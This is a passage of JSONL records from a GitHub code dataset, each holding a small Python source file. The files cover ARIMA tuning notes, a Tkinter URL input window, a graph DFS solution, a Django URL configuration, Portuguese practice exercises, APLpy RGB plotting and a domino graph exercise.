ind 10 gen\n # 5,0,0 128 ind 10 gen\n # 14,3,0 64 ind 10 gen\n # 10,2,0 128 ind 5 gen\n # 8,1,0 64 ind 5 gen\n # 7,3,0 64 ind 5 gen\n # 3,2,0 64 ind 5 gen\n # 13,3,0 64 ind 5 gen \n # 11,3,0 64 ind 5 gen \n # 10,0,0 64 ind 5 gen \n \n # Combinaciones obtenidas para un dataset fijo: (64 ind, 5 gen, 0.5 cruce, 0.4 prob mutar un individuo, 0.4 prob mutar un gen) -- 12 min\n \n # 1,0,0 -- 2.100\n # 1,0,0 -- 2.100\n \n # Combinaciones obtenidas para un dataset fijo: (32 ind, 3 gen, 0.5 cruce, 0.4 prob mutar un individuo, 0.4 prob mutar un gen)\n \n # 1,0,0 -- 2.100\n # 1,0,0 -- 2.100 -- 211s || 256s -- SMAPE: 1.041 -- MSE: 2096.48\n # 12,1,0 -- 6.549 -- 237s || 256s -- SMAPE: 1.041 -- MSE: 2096.48 \n \n ","repo_name":"LMAFR/ARIMA_in_trading","sub_path":"ARIMA_optim_alggen.py","file_name":"ARIMA_optim_alggen.py","file_ext":"py","file_size_in_byte":7791,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70397775609","text":"from tkinter import LEFT, RIGHT, Toplevel, ttk, Text, messagebox\nfrom greenflare.widgets.windowhelper import center_on_parent\nimport urllib.parse\n\n\nclass ListModeWindow(Toplevel):\n\n def __init__(self, crawler=None, crawl_tab=None, root=None):\n Toplevel.__init__(self)\n \n self.crawler = crawler\n self.crawl_tab = crawl_tab\n\n self.resizable(False, False)\n self.title(\"Greenflare SEO Crawler - List Mode Input URLs\")\n\n self.top_frame = ttk.Frame(self)\n self.top_frame.pack(anchor='center', padx=5, pady=5, fill='x')\n\n self.middle_frame = ttk.Frame(self)\n self.middle_frame.pack(anchor='center', padx=5, pady=5, fill='x')\n\n self.bottom_frame = ttk.Frame(self)\n self.bottom_frame.pack(anchor='center', padx=5, pady=5, fill='x')\n\n self.label_input = ttk.Label(\n self.top_frame, text=\"Enter or paste URLs to spider list crawl, one per line.\")\n self.label_input.pack(side=LEFT)\n\n self.url_input_field = Text(self.middle_frame)\n self.url_input_field.pack()\n\n self.list_crawl_btn = ttk.Button(\n self.bottom_frame, text=\"OK\", command=self.start_list_crawl)\n self.list_crawl_btn.pack(side=RIGHT)\n\n center_on_parent(self.master, self)\n\n def start_list_crawl(self):\n urls = self.url_input_field.get(\"1.0\", 'end-1c')\n urls = urls.splitlines()\n\n # Parse urls and only keep valid URLs\n urls = [u for u in urls if self.url_check(u) == True]\n\n # Dedupe URLs\n urls = list(set(urls))\n\n if len(urls) > 0:\n self.crawler.settings['MODE'] = 'List'\n self.crawler.list_mode_urls = urls\n self.crawl_tab.show_list_mode()\n self.destroy()\n messagebox.showinfo(title='Reading URLs completed', message=f'Loaded {len(urls)} valid and unique URLs!')\n else:\n messagebox.showerror(title='Reading URLs failed',\n message='No valid URLs found, please check your input!')\n\n def url_check(self, url):\n try:\n scheme, netloc, path, query, frag = urllib.parse.urlsplit(url)\n if all([scheme, netloc]):\n return True\n return False\n except:\n return False\n","repo_name":"beb7/gflare-tk","sub_path":"greenflare/widgets/listcrawl.py","file_name":"listcrawl.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"77"} +{"seq_id":"32285196359","text":"from typing import List\n\n\nclass Solution:\n def findCircleNum(self, isConnected: List[List[int]]) -> int:\n\n def dfs(pos: int) -> None:\n\n if visited[pos]:\n return\n\n visited[pos] = True\n\n for i in range(n):\n if isConnected[pos][i]:\n dfs(i)\n\n n = len(isConnected)\n\n visited = [False] * n\n\n res = 0\n\n for i in range(n):\n for j in range(n):\n\n if visited[i]:\n break\n\n if i == j:\n continue\n\n visited[i] = True\n if isConnected[i][j]:\n dfs(j)\n\n visited[i] = False\n\n if not visited[i]:\n res += 1\n\n visited[i] = True\n\n return res\n","repo_name":"Vortexx2/DSA-questions","sub_path":"leetcode/medium/547-num-provinces/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5396701606","text":"from matplotlib import pyplot as plt\nimport torch\n\nfrom src.data_preprocessing.load_dataset import BASE_DIR\nfrom src.data_preprocessing.load_dataset import test_loader\n\nMODEL_DIR = f'{BASE_DIR}src/experiments/colab/'\n\ndef predict_dabenet(device = torch.device(\"cuda:0\")):\n cnt = 0\n rows = 5\n columns = 3\n fig = plt.figure(figsize=(20, 20))\n best_model = torch.load(MODEL_DIR + 'out_model.pt')\n best_model.eval()\n\n for img, label in test_loader:\n cnt += 1\n\n #print(img[0].size())\n temp = img[0].swapaxes(0,1)\n temp = temp.swapaxes(1,2)\n fig.add_subplot(rows, columns, (cnt-1)*3+1)\n plt.imshow(temp)\n\n\n preds = best_model(img.to(device))\n preds = (preds > 0.5).float()\n temp2 = preds[0].swapaxes(0,1)\n temp2 = temp2.swapaxes(1,2)\n fig.add_subplot(rows, columns, (cnt-1)*3+2)\n plt.imshow(temp2[:,:,0].cpu().detach().numpy())\n\n temp1 = label[0].swapaxes(0,1)\n temp1 = temp1.swapaxes(1,2)\n fig.add_subplot(rows, columns, (cnt-1)*3+3)\n plt.imshow(temp1[:,:,0])\n\n if cnt == 5: break\n plt.show()","repo_name":"peswoccc/Building-Extraction","sub_path":"src/predict_dabenet.py","file_name":"predict_dabenet.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15893657267","text":"import sys\nsys.stdin = open(\"2382.txt\")\n\nfrom collections import deque\n\nT = int(input())\n\ndx = [-1,0,1,0]\ndy = [0,-1,0,1]\n\nfor tc in range(1,1+T):\n N,M,K = map(int, input().split())\n\n micro = [list(map(int, input().split())) for _ in range(K)]\n q = deque()\n\n board = [[0 for _ in range(N)] for _ in range(N)]\n\n for a in micro:\n y,x,n,dir = a\n if dir == 1:\n dir = 1\n elif dir == 2:\n dir = 3\n elif dir == 3:\n dir = 0\n elif dir == 4:\n dir = 2\n\n board[y][x] = [[x,y,n,dir]]\n\n for time in range(M):\n\n for i in range(N):\n for j in range(N):\n if board[i][j]:\n n = 0\n max_n = 0\n dir = 0\n for inf in board[i][j]:\n n += inf[2]\n if max_n < inf[2] :\n max_n = inf[2]\n dir = inf[3]\n\n q.append([j,i,n,dir])\n board[i][j] = 0\n\n\n while q:\n t = q.popleft()\n x,y,n,dir = t\n\n nx, ny = x+dx[dir], y+dy[dir]\n\n if nx in [0,N-1] or ny in [0,N-1]:\n n = n//2\n dir = (dir+2)%4\n\n if board[ny][nx] == 0:\n board[ny][nx] = [[nx,ny,n,dir]]\n\n else:\n board[ny][nx].append([nx,ny,n,dir])\n\n\n ans = 0\n for i in range(N):\n for j in range(N):\n if board[i][j]:\n for inf in board[i][j]:\n ans += inf[2]\n print(\"#{} {}\" .format(tc, ans))\n","repo_name":"Nyapy/TIL","sub_path":"04_algorithm/SWExpertAcademy/2382미생물격리.py","file_name":"2382미생물격리.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"70531155128","text":"import csv\n\ncsv.field_size_limit(100000000)\n\nWEEKS = {\n 'P1', 'P2', 'P3', 'P4', 'P5', 'P6', 'P7',\n 'P8', 'P9', 'P10', 'P11', 'P12', 'P13', 'P14',\n 'P15', 'P16', 'P17', 'P18', 'P19', 'P20', 'P21',\n 'P22', 'P23', 'P24', 'P25', 'P26', 'P27', 'P28',\n 'P29', 'P30', 'P31', 'P32', 'P33', 'P34', 'P35',\n 'P36', 'P37', 'P38', 'P39', 'P40', 'B1', 'B2', 'B3',\n 'B4', 'B5', 'B6', 'B7', 'B8', 'B9', 'B10', 'B11', 'B12',\n 'B13', 'B14', 'B15', 'B16', 'B17', 'B18', 'B19', 'B20',\n 'B21', 'B22', 'B23', 'B24', 'B25', 'B26', 'B27', 'B28',\n 'B29', 'B30', 'B31', 'B32', 'B33', 'B34', 'B35', 'B36',\n 'B37', 'B38', 'B39', 'B40', 'B41', 'B42', 'B43', 'B44',\n 'B45', 'B46', 'B47', 'B48', 'B49', 'B50', 'B51', 'B52',\n 'B53', 'B54', 'B55', 'B56', 'B57', 'B58', 'B59', 'B60',\n 'B61', 'B62', 'B63', 'B64', 'B65', 'B66', 'B67', 'B68',\n 'B69', 'B70', 'B71', 'B72', 'B73', 'B74', 'B75', 'B76',\n 'B77', 'B78', 'B79', 'B80', 'B81', 'B82', 'B83', 'B84',\n 'B85', 'B86', 'B87', 'B88', 'B89', 'B90', 'B91', 'B92',\n 'B93', 'B94', 'B95', 'B96', 'B97', 'B98', 'B99', 'B100',\n 'B101', 'B102', 'B103', 'B104', 'B105',\n}\n\n\ndef tagging_file(file='', workdir='./', delimiter=';', quotechar='\\\"'):\n content = []\n with open(f'{workdir}/{file}') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=delimiter, quotechar=quotechar)\n content = [row for row in csv_reader]\n\n stages_uniq_array = {}\n stages_theme_uniq_array = {}\n bugs_report = []\n\n weeks_index = content[0].index('weeks') if 'weeks' in content[0] else -1\n stage_index = content[0].index('stage') if 'stage' in content[0] else -1\n stage_theme_index = content[0].index('stage_themes') if 'stage_themes' in content[0] else -1\n main_topic_index = content[0].index('main_topic') if 'stage_themes' in content[0] else -1\n\n if 'servings' in content[0]:\n content[0][content[0].index('servings')] = 'serving'\n\n if 'id' in content[0]:\n content[0][content[0].index('id')] = 'id_d8'\n\n def change_delimiter(index, row):\n if row.find(',') != -1 or row.find(';') != -1 or row.find('.') != -1:\n\n if row.find(',') != -1:\n row = row.replace(',', '|')\n\n if row.find(';') != -1:\n row = row.replace(';', '|')\n\n if row.find('.') != -1:\n row = row.replace('.', '|')\n\n bugs_report.append(f'On line {index} delimiter problem')\n\n row = '|'.join([item.strip() for item in row.split('|')])\n return row\n return row\n\n for index, row in enumerate(content[1::]):\n if index != 0:\n\n if main_topic_index != 1:\n row[main_topic_index] = change_delimiter(index, row[main_topic_index])\n\n if weeks_index != -1:\n weeks_item = change_delimiter(index, row[weeks_index])\n weeks_arr = [item for item in weeks_item.split('|') if item not in WEEKS and item != '']\n if len(weeks_arr) > 0:\n row[weeks_index] = '|'.join([item for item in weeks_item.split('|') if item not in weeks_arr])\n bugs_report.append('New element(s): [' + ', '.join(weeks_arr) + f'] on line {index}')\n else:\n row[weeks_index] = weeks_item\n\n if stage_index != -1:\n row[stage_index] = change_delimiter(index, row[stage_index])\n stages_arr = row[stage_index].split('|')\n\n for i in stages_arr:\n if i not in stages_uniq_array:\n stages_uniq_array[i.lower()] = i\n else:\n if stages_uniq_array[i.lower()] != i:\n stages_arr.remove(i)\n stages_arr.append(stages_uniq_array[i.lower()])\n\n row[stage_index] = '|'.join(stages_arr)\n\n if stage_theme_index != -1:\n row[stage_theme_index] = change_delimiter(index, row[stage_theme_index])\n stages_theme_arr = row[stage_theme_index].split('|')\n\n for i in stages_theme_arr:\n if i not in stages_theme_uniq_array:\n stages_theme_uniq_array[i.lower()] = i\n else:\n if stages_theme_uniq_array[i.lower()] != i:\n stages_theme_arr.remove(i)\n stages_theme_arr.append(stages_theme_uniq_array[i.lower()])\n\n row[stage_theme_index] = '|'.join(stages_theme_arr)\n\n with open(f'{workdir}/NEW_{file}', 'w+') as file:\n file_writer = csv.writer(file, delimiter=\";\", lineterminator=\"\\n\", quotechar='\"')\n for row in content:\n file_writer.writerow(row)\n\n\n report = '\\t'.join(bugs_report)\n print(report)\n\ntagging_file('tagging_article.csv', '/home/zazulnitski/Загрузки')\n# tagging_file('tagging_recipe.csv', '/home/zazulnitski/Загрузки')\n# tagging_file('tagging_product.csv', '/home/zazulnitski/Загрузки')\n","repo_name":"zazulnitski-dev/babyme","sub_path":"tagginTool.py","file_name":"tagginTool.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11516623721","text":"\"\"\"sportshop URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.contrib.auth.models import Group\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom shop.views import redirect_home\nfrom social_django.models import Association, Nonce, UserSocialAuth\nfrom cart.models import Cart, CartItem\n\n\nurlpatterns = [\n path('admin/', include('admin_black.urls')),\n path('admin/', admin.site.urls),\n path('account/', include('account.urls')),\n path('social-auth/', include('social_django.urls', namespace='social')),\n path('shop/', include('shop.urls', namespace='shop')),\n path('cart/', include('cart.urls', namespace='cart')),\n path('orders/', include('orders.urls', namespace='orders')),\n path('', redirect_home),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nadmin.site.unregister(Group)\nadmin.site.unregister(Association)\nadmin.site.unregister(Nonce)\nadmin.site.unregister(UserSocialAuth)\nadmin.site.unregister(Cart)\nadmin.site.unregister(CartItem)\nadmin.site.site_header = 'Sporty Admin Panel'\nadmin.site.site_title = 'Sporty Admin'\nadmin.site.index_title = 'Sporty Admin'","repo_name":"wongcheehong/Django-Ecommerce-FYP","sub_path":"sportshop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6116421816","text":"#Ex 90:Faça um programa que leia o nome e a média de um aluno, guardando também a situação em um dicionário. No final mostre o\r\n#conteúdo da estrutura na tela.\r\nestudante = {}\r\nestudante['Aluno'] = input('Nome do aluno: ')\r\nestudante['Média'] = int(input(f'Média de {estudante[\"Aluno\"]}: '))\r\nif estudante['Média'] >= 7:\r\n estudante['Situação'] = 'Aprovado'\r\nelse:\r\n estudante['Situação'] = 'Reprovado'\r\nfor k, v in estudante.items():\r\n print(f'{k} é igual a {v}')\r\n\r\n#Ex 91: Crie um programa onde 4 jogadores joguem um dado e tenham resultados aleatórios. Guarde esses resultados em um dicionário.\r\n#No final coloque esse dicionário em ordem sabendo que o vencedor foi aquele que tirou o maior número.\r\nfrom random import randint\r\nfrom operator import itemgetter\r\njogadores = {'jogador1': randint(1, 6), 'jogador2': randint(1, 6), 'jogador3': randint(1, 6), 'jogador4': randint(1, 6)}\r\nprint('Valores Sorteados:')\r\nfor k,v in jogadores.items():\r\n print(f'O {k} tirou {v} no dado')\r\nranking = []\r\nranking = sorted(jogadores.items(), key=itemgetter(1), reverse=True)\r\nprint('Ranking dos jogadores')\r\nfor i, v in enumerate(ranking):\r\n print(f'{i+1}º lugar: {v[0]} com {v[1]}')\r\n\r\n#Ex 92: Crie um programa que leia nome, ano de nascimento e carteira de trabalho e cadastre-os (com idade) em um dicionário.\r\n# Se a CTPS for diferente de zero, o dicionário receberá tembém o ano de contratação e o salário. Calcule e acrescente além\r\n# da idade, com quantos anos a pessoa vai se aposentar.\r\nfrom datetime import datetime\r\npessoa = {}\r\npessoa['Nome'] = input('Nome: ')\r\nnascimento = int(input('Ano de nascimento: '))\r\npessoa['Idade'] = datetime.now().year - nascimento\r\npessoa['CTPS'] = int(input('Nº carteira de trabalho:[0] caso não tenha. '))\r\nif pessoa['CTPS'] != 0:\r\n pessoa['Ano de contratação'] = int(input('Ano de contratação: '))\r\n pessoa['Salário'] = int(input('Salário: '))\r\n pessoa['Aposentadoria'] = pessoa['Ano de contratação'] + 40\r\nfor k, v in pessoa.items():\r\n print(f'{k} tem o valor {v}.')\r\n\r\n#Ex 93:Crie um programa que gerencie o aproveitamento de um jogo de futebol. O programa vai ler o nome do jogador e quantas\r\n#partidas ele jogou. Depois vai ler a quantidade de gols feita em cada partida. No final tudo isso será guardado em um\r\n#dicionário, incluindo o total de gols feitos durante o campeonato.\r\njogador = {}\r\ngols = []\r\njogador['nome'] = input('Nome: ')\r\njogador['gols'] = int(input('Nº partidas: '))\r\nfor c in range(1, jogador['gols'] + 1):\r\n gols.append(int(input(f'Quantos gols na partida {c} ')))\r\njogador['total de gols'] = sum(gols)\r\njogador['gols'] = gols\r\nprint(jogador)\r\nfor k,v in jogador.items():\r\n print(f'O campo {k} tem o valor {v}')\r\nprint(f'O jogador {jogador[\"nome\"]} jogou {len(gols)} partidas.')\r\nfor c,v in enumerate(gols):\r\n print(f'Na partida {c + 1} foram {v} gols')\r\nprint(f'Foi um total de {sum(gols)} gols.')\r\n\r\n#Ex 94: Crie um programa que leia o nome, idade e sexo de várias pessoas. Guardando os dados de cada pessoa em um dicionário\r\n#e todos os dicionários em uma lista. No final mostre: Quantas pessoas foram cadastradas, a média de idade do grupo, uma lista\r\n#com todas as mulheres, uma lista com todas as pessoas com idade acima da média.\r\npessoas = []\r\ndados = {}\r\nidades = []\r\nwhile True:\r\n dados.clear()\r\n dados['Nome'] = input('Nome: ')\r\n dados['Idade'] = int(input('Idade: '))\r\n idades.append(dados['Idade'])\r\n dados['Sexo'] = input('Sexo: ').upper()\r\n pessoas.append(dados.copy())\r\n resposta = input('Quer continuar?[S/N] ')\r\n if resposta in 'Nn':\r\n break\r\nmédiaidades = sum(idades) / len(idades)\r\nprint(f'Foram cadastradas {len(pessoas)} pessoas.')\r\nprint(f'A média de idades é {médiaidades:.1f}.')\r\nprint(f'As mulheres cadastradas foram', end=' ')\r\nfor c in pessoas:\r\n if c['Sexo'] == 'F':\r\n print(f'{c[\"Nome\"]}')\r\nprint()\r\nfor c in pessoas:\r\n if c['Idade'] > médiaidades:\r\n print(f'Acima da média estão {c[\"Nome\"]}')\r\n\r\n#Ex 95: Aprimore o desafio 93 para que ele funcione com vários jogadores, incluindo um sistema de visualização de detalhes\r\n#de aproveitamento de cada jogador.\r\ndado=dict()\r\nt=[]\r\nw=[]\r\nn=[]\r\nwhile True:\r\n dado.clear()\r\n dado[\"nome\"]=str(input('digite o nome do jogador: '))\r\n j=int(input('quantas partidas o {} jogo?: '.format(dado[\"nome\"])))\r\n n.clear()\r\n for i in range(j):\r\n n.append(int(input('quantos gols foi feito na partida {}: '.format(i))))\r\n dado[\"gols\"] = n[:]\r\n dado[\"total\"] = sum(n)\r\n w.append(dado.copy())\r\n n2=str(input(\"quer continuar?\")).upper().strip()[0]\r\n while n2 not in \"NnSs\":\r\n print('resposta invalida,digite novamnete ')\r\n n2=str(input(\"quer continuar?\")).upper().strip()[0]\r\n if n2 in \"Nn\":\r\n break\r\nprint('',end='')\r\nfor i in dado.keys():\r\n print('{:<15}'.format(i), end=' ')\r\nprint()\r\nfor k,v in enumerate(w):\r\n print('{:>2} '.format(k), end='')\r\n for d in v.values():\r\n print('{:<15}'.format(str(d)),end=' ')\r\n print()\r\nwhile True:\r\n n3=int(input('digite o numero do jogador,(999 para sair): '))\r\n if n3 == 999:\r\n break\r\n if n3>len(w):\r\n print('não tem esse numero')\r\n for h,q in enumerate(w):\r\n if h==n3:\r\n print('levatamento dos do jogador {}'.format(h))\r\n print('nome:{} '.format(h,q[\"nome\"]))\r\n","repo_name":"guilhermegssilva/Practice","sub_path":"Conteúdos Diversos/Python/Curso em Vídeo/10.1 Exercícios Dicionários.py","file_name":"10.1 Exercícios Dicionários.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40887412978","text":"\nclass Response:\n\n def __init__(self):\n self.id = None\n self.auth = None\n self.type = []\n self.name = None\n self.ttl = []\n self.answer = []\n self.additional = []\n self.num_answers = 0\n self.num_additional = 0\n \n def display_response(self):\n index = 0 # keep track of index in ttl and type\n if self.num_answers != 0:\n print(\"\\n***Answer Section (\" + str(self.num_answers) + \" records)***\\n\")\n # Goes through all answers, formats them appropriately and prints the lines\n for answer in self.answer:\n if self.type[index] == 1 or self.type[index] == 2 or self.type[index] == 5 or self.type[index] == 15:\n response = \"\"\n if self.type[index] == 1:\n response += \"IP\\t\"\n elif self.type[index] == 2:\n response += \"NS\\t\"\n elif self.type[index] == 5:\n response += \"CNAME\\t\"\n else:\n response += \"MX\\t\"\n \n response += answer + \"\\t\"\n response += str(self.ttl[index]) + \"\\t\"\n\n if self.auth == '1':\n response += \"auth\"\n else:\n response += \"nonauth\"\n \n print(response)\n index += 1\n \n add_responses = []\n # Goes through all additional records and formats them appropriately\n # Filters out the non-compatible records\n for additional in self.additional:\n if self.type[index] == 1 or self.type[index] == 2 or self.type[index] == 5 or self.type[index] == 15:\n response = \"\"\n if self.type[index] == 1:\n response += \"IP\\t\"\n elif self.type[index] == 2:\n response += \"NS\\t\"\n elif self.type[index] == 5:\n response += \"CNAME\\t\"\n else:\n response += \"MX\\t\"\n \n response += additional + \"\\t\"\n response += str(self.ttl[index]) + \"\\t\"\n\n if self.auth == '1':\n response += \"auth\"\n else:\n response += \"nonauth\"\n \n add_responses.append(response)\n else:\n self.num_additional -= 1\n index += 1\n \n if self.num_additional != 0:\n print(\"\\n***Additional Section (\" + str(self.num_additional) + \" records)***\\n\")\n \n # prints all the appropriate additional records\n for additional in add_responses:\n print(additional)\n \n print(\"\\n\")\n \n\n\n ","repo_name":"amanijam/ECSE316_A1","sub_path":"response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14681580812","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 25 14:16:04 2021\n\nMake RGB Images\n\n@author: Rohit\n@modified by: Parichay\n\"\"\"\n\nimport aplpy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nrgb_path = \"/home/pmazumdar/Documents/LASMA/Reduction/class_maps/temp/\"\nplot_path = \"/home/pmazumdar/Documents/LASMA/G305 Papers/Paper 2/\"\n\naplpy.make_rgb_cube([rgb_path+'G305-MSX-21-reproject.fits', \\\n rgb_path+'G305-GLM-8-reproject.fits', \\\n rgb_path+'G305-HPACS-70-reproject.fits'],\\\n rgb_path+'G305_rgb.fits', north=False)\n\naplpy.make_rgb_image(rgb_path+'G305_rgb.fits', rgb_path+'example_cube.eps',\n vmin_r=-1e-6, vmax_r=4.5e-5, stretch_r='linear',\n vmin_g=70, vmax_g=550, stretch_g='sqrt',\n vmin_b=0.3, vmax_b=2, stretch_b='log')\n\n###############################################################################################\n\naplpy.make_rgb_cube([rgb_path+'G305-MSX-21-reproject.fits', \\\n rgb_path+'G305-GLM-8-reproject.fits', \\\n rgb_path+'G305_13CO_mom_0.fits'],\\\n rgb_path+'G305_rgb_13CO.fits', north=False)\n\naplpy.make_rgb_image(rgb_path+'G305_rgb_13CO.fits', rgb_path+'example_cube_13CO.eps',\n vmin_r=-1e-6, vmax_r=4.5e-5, stretch_r='linear',\n vmin_g=70, vmax_g=550, stretch_g='sqrt',\n vmin_b=0.5, vmax_b=45, stretch_b='sqrt')\n\nplt.rcParams.update({'font.size':12})\n\nFrgb = aplpy.FITSFigure(rgb_path+'G305_rgb_13CO_2d.fits')\nFrgb.show_rgb(rgb_path+'example_cube_13CO.eps')\n\nx_Danks = np.array([305.3384,305.3934])\ny_Danks = np.array([+00.0719,+00.0874])\nradii_Danks = np.array([0.018,0.026])\nFrgb.show_circles(x_Danks,y_Danks,radius=radii_Danks,edgecolor='white',facecolor='none',linewidths=1)\n\nx_wr48 = 305.361\ny_wr48 = +00.056\n\nFrgb.show_markers(x_wr48,y_wr48,edgecolor='white',marker='*', facecolor='none',s=100,linewidth=1)\n\nFrgb.savefig(plot_path+'G305_RGB.eps')\n#Frgb.savefig(plot_path+'G305_RGB.png',dpi=400)\n\n### Test RGB Range: ##########################################################################\n \nFr = aplpy.FITSFigure(rgb_path+'G305-MSX-21-reproject.fits')\nFr.show_colorscale(vmin=0.00001,vmax=0.000175, stretch='log')\nFr.add_colorbar()\n\nFg = aplpy.FITSFigure(rgb_path+'G305-GLM-8-reproject.fits')\nFg.show_colorscale(vmin=70,vmax=600,stretch='log')\nFg.add_colorbar()\n\nFb = aplpy.FITSFigure(rgb_path+'G305-HPACS-70-reproject.fits')\nFb.show_colorscale(vmin=0.5,vmax=7,stretch='log')\nFb.add_colorbar()\n\n\n","repo_name":"mazpar/G305-paper-2","sub_path":"make_rgb_plots.py","file_name":"make_rgb_plots.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"899131782","text":"import csv\r\nimport sqlcplants\r\n\r\nclass Language:\r\n def __init__(self, lang):\r\n self.lang = lang\r\n self.dict = {}\r\n if self.lang != \"en\":\r\n self.read_dict_from_csv()\r\n self.read_dict_from_db()\r\n\r\n def read_dict_from_csv(self):\r\n with open(f\"{self.lang}.csv\", newline='', encoding='utf-8') as csvfile:\r\n reader = csv.reader(csvfile, delimiter=';')\r\n for row in reader:\r\n self.dict[row[0]] = row[1]\r\n\r\n def read_dict_from_db(self):\r\n dict2 = sqlcplants.getDictionary()\r\n self.dict.update(dict2)\r\n\r\n def get(self, key):\r\n if self.lang != \"en\":\r\n val = self.dict.get(key)\r\n if val == None:\r\n val = \"*\" + key\r\n else:\r\n val = key\r\n return val\r\n\r\n def rget(self, value):\r\n #print(\"value in rget:\"+value)\r\n if self.lang != \"en\":\r\n for k, v in self.dict.items():\r\n if v == value:\r\n return k\r\n return \"*\" + value\r\n else:\r\n return value\r\n\r\n","repo_name":"RPDaniels/CPlant","sub_path":"langmgr.py","file_name":"langmgr.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"22946363829","text":"from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\r\n\r\nfrom keyboards.inline.callBackData import global_callback\r\n\r\nmanzillar = {\r\n \"Toshkent\": \"Tashkent\",\r\n \"London\": \"London\",\r\n \"Washington\": \"Washington\",\r\n \"Istanbul\": \"Istanbul\",\r\n \"Tokio\": \"Tokio\",\r\n \"Moskva\": \"Moskow\",\r\n}\r\n\r\n#manzil inline keyboard\r\nglobalChiptaKetmoqMenu = InlineKeyboardMarkup(row_width=2)\r\nglobalChiptaManzilMenu = InlineKeyboardMarkup(row_width=2)\r\n\r\nfor key, value in manzillar.items():\r\n globalChiptaKetmoqMenu.insert(InlineKeyboardButton(text=key, callback_data=global_callback.new(value+\"_k\")))\r\n globalChiptaManzilMenu.insert(InlineKeyboardButton(text=key, callback_data=global_callback.new(value)))\r\n\r\nback = InlineKeyboardButton(text=\"🔙 Orqaga\", callback_data='g_cancel')\r\nback_k = InlineKeyboardButton(text=\"🔙 Orqaga\", callback_data='g_cancel_k')\r\nglobalChiptaKetmoqMenu.insert(back_k)\r\nglobalChiptaManzilMenu.insert(back)","repo_name":"RahimovIlhom/Avia-chipta-bot","sub_path":"keyboards/inline/glocalChiptaKeyboards.py","file_name":"glocalChiptaKeyboards.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"14549082167","text":"\"\"\"\nMamy pewien układ klocków domino. Otrzymujemy go w postaci listy par [a, b]: Jeżeli przewrócimy klocek a, to klocek b\nteż się przewróci. Chcemy znaleźć minimalną liczbę klocków, które trzeba przewrócić ręcznie, aby wszystkie domina były\nprzewrócone.\n\"\"\"\n\"\"\"\nbuduje graf, puszczam sobie dfs, i w klockach przewróconych przesz inne klocki zazanzczam w tablicy jako True \n, pote zliczam ile nie zostalo przewroconych przez inne i to jest moja minimalna liczba\n\"\"\"\n\n\ndef DFS_visit(G, u, visited, parent, flipped):\n visited[u] = True\n for v in G[u]:\n if not visited[v]:\n flipped[v] = True\n parent[v] = u\n DFS_visit(G, v, visited, parent, flipped)\n\n\ndef DFS(G):\n visited = [False for _ in range(len(G))]\n flipped = [False for _ in range(len(G))]\n parent = [-1 for _ in range(len(G))]\n for u in range(len(G)):\n if not visited[u]:\n DFS_visit(G, u, visited, parent, flipped)\n return flipped\n\n\ndef make_graph(dominos):\n max_size = -1\n for i in range(len(dominos)):\n if max_size < dominos[i][0]:\n max_size = dominos[i][0]\n elif max_size < dominos[i][1]:\n max_size = dominos[i][1]\n\n new_graph = [[] for _ in range(max_size+2)]\n for i in range(len(dominos)):\n new_graph[dominos[i][0]].append(dominos[i][1])\n\n return new_graph\n\n\ndef count_flips(dominos):\n graph = make_graph(dominos)\n flipped = DFS(graph)\n counter = 0\n\n for i in range(len(flipped)):\n if flipped[i] is not True:\n counter += 1\n\n return counter\n\n\ndominos = [[2, 3], [3, 5], [6, 7], [7, 8], [8, 10], [11, 13], [14, 15], [9, 12], [2, 4], [3, 9]]\ndominos1 = [[2, 3], [3, 5], [6, 7], [7, 8], [8, 10], [11, 13], [14, 15]]\nprint(count_flips(dominos1))","repo_name":"pvtrov/algorithms-and-data-structures","sub_path":"exercises_from_course/excercises_from_bit_/graphs/2_4_dominos.py","file_name":"2_4_dominos.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} 